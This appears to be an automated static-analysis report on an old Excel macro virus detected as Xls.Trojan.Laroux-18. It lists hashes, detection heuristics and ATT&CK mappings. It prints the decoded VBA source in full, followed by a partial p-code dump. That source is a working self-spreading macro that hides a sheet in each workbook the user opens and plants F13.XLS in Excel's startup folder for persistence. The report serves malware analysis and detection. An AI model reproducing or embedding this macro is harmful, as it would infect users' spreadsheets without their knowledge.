Xls.Trojan.Laroux-18 — Office (OLE) malware analysis

Static analysis result for SHA-256 192e609375588cf6…

MALICIOUS

Office (OLE)

41.0 KB Created: 1999-02-08 09:24:15 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 1079219758f751f80c867e4bd7a48b7a SHA-1: ec4e7a368d119fefdaa0a33a2175cb22d8752443 SHA-256: 192e609375588cf631b4d66e51c6a9f85fb73cfc80185d40ffb194721de970f4
220 Risk Score

Malware Insights

Xls.Trojan.Laroux-18 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

This Excel file contains VBA macros, including an Auto_Open subroutine, which is a common technique for executing malicious code upon opening the document. The ClamAV detection 'Xls.Trojan.Laroux-18' strongly suggests a known malware family. The script attempts to copy itself and potentially establish persistence by saving a file named 'F13.XLS' in the startup path.

Heuristics 4

  • ClamAV: Xls.Trojan.Laroux-18 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Laroux-18
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6057 bytes
SHA-256: b7b9d14710b784aa8fd7d8d42776fcd54fe4f491bea5d5ba416bd34195ab909a
Detection
ClamAV: Xls.Trojan.Laroux-18
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "F13"






Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
    If Day(Now()) = 13 And Format(Now(), "ddd") = "Fri" Then
        MsgBox "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" & Chr(13) & "!!! Friday thirteenth !!!!" _
               & Chr(13) & "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"
    End If
    Application.OnSheetActivate = "chk_fls"
End Sub
Sub auto_close()
Attribute auto_close.VB_ProcData.VB_Invoke_Func = " \n14"
    Application.DisplayAlerts = False
    Workbooks("F13.XLS").Close savechanges:=False
End Sub
Sub chk_fls()
Attribute chk_fls.VB_ProcData.VB_Invoke_Func = " \n14"
 If Dir(Application.StartupPath & "\" & "F13.XLS") = "F13.XLS" Then p = 1 Else p = 0
 If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
 FCD = p + w * 10
    
 Application.ScreenUpdating = False
 N_FNM = ActiveWorkbook.Name
 Select Case FCD
    Case 1
     If Workbooks(N_FNM).Sheets(1).Name <> "F13" Then
        Workbooks("F13.XLS").Sheets("F13").Copy before:=Workbooks(N_FNM).Sheets(1)
        Workbooks(N_FNM).Sheets("F13").Visible = False
     End If
    
    Case 10
     Workbooks.Add
     Workbooks(N_FNM).Sheets("F13").Copy After:=Workbooks(ActiveWorkbook.Name).Sheets(1)
     
     Workbooks(ActiveWorkbook.Name).SaveAs FileName:=Application.StartupPath & "/" & "F13.XLS", FileFormat:=xlNormal _
        , Password:="", WriteResPassword:="", ReadOnlyRecommended:= _
        False, CreateBackup:=False
     Windows("F13.XLS").Visible = False
    
    Case 11
     Windows("F13.XLS").Visible = False
    Case Else
 End Select
 Application.OnSheetActivate = ""
 Application.ScreenUpdating = True
 Application.OnSheetActivate = "F13.XLS!chk_fls"
End Sub


' Processing file: /opt/analyzer/scan_staging/9089f55427004924a0c62a84aac149e8.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/F13 - 3910 bytes
' Line #0:
' Line #1:
' Line #2:
' Line #3:
' Line #4:
' Line #5:
' Line #6:
' 	FuncDefn (Sub auto_open())
' Line #7:
' 	ArgsLd Now 0x0000 
' 	ArgsLd Day 0x0001 
' 	LitDI2 0x000D 
' 	Eq 
' 	ArgsLd Now 0x0000 
' 	LitStr 0x0003 "ddd"
' 	ArgsLd Format$ 0x0002 
' 	LitStr 0x0003 "Fri"
' 	Eq 
' 	And 
' 	IfBlock 
' Line #8:
' 	LineCont 0x0004 09 00 0F 00
' 	LitStr 0x0026 "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"
' 	LitDI2 0x000D 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x001A "!!! Friday thirteenth !!!!"
' 	Concat 
' 	LitDI2 0x000D 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x0026 "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"
' 	Concat 
' 	ArgsCall MsgBox 0x0001 
' Line #9:
' 	EndIfBlock 
' Line #10:
' 	LitStr 0x0007 "chk_fls"
' 	Ld Application 
' 	MemSt OnSheetActivate 
' Line #11:
' 	EndSub 
' Line #12:
' 	FuncDefn (Sub auto_close())
' Line #13:
' 	LitVarSpecial (False)
' 	Ld Application 
' 	MemSt DisplayAlerts 
' Line #14:
' 	LitVarSpecial (False)
' 	ParamNamed savechanges 
' 	LitStr 0x0007 "F13.XLS"
' 	ArgsLd Workbooks 0x0001 
' 	ArgsMemCall Close 0x0001 
' Line #15:
' 	EndSub 
' Line #16:
' 	FuncDefn (Sub chk_fls())
' Line #17:
' 	Ld Application 
' 	MemLd StartupPath 
' 	LitStr 0x0001 "\"
' 	Concat 
' 	LitStr 0x0007 "F13.XLS"
' 	Concat 
' 	ArgsLd Dir 0x0001 
' 	LitStr 0x0007 "F13.XLS"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitDI2 0x0001 
' 	St p 
' 	Else 
' 	BoSImplicit 
' 	LitDI2 0x0000 
' 	St p 
' 	EndIf 
' Line #18:
' 	Ld ActiveWorkbook 
' 	MemLd Modules 
' 	MemLd Count 
' 	LitDI2 0x0000 
' 	Gt 
' 	If 
' 	BoSImplicit 
' 	LitDI2 0x0001 
' 	St w 
' 	Else 
' 	BoSImplicit 
' 	LitDI2 0x0000 
' 	St w 
' 	EndIf 
' Line #19:
' 	Ld p 
' 	Ld w 
' 	LitDI2 0x000A 
' 	Mul 
' 	Add 
' 	St FCD 
' Line #20:
' Line #21:
' 	LitVarSpecial (False)
' 	Ld Application 
' 	MemSt ScreenUpdating 
' Line #22:
' 	Ld ActiveWorkbook 
' 	MemLd New 
' 	St N_FNM 
' Line #23:
' 	Ld FCD 
' 	SelectCase 
' Line #24:
' 	LitDI2 0x0001 
' 	Case 
' 	CaseDone 
' Line #25:
' 	LitDI2 0x0001 
' 	Ld N_FNM 
' 	ArgsLd Workbooks 0x0001 
' 	ArgsMemLd Sheets 0x0001 
' 	MemLd New 
' 	LitStr 0x0003 "F13"
' 	Ne 
' 	IfBlock 
' Line #26:
' 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.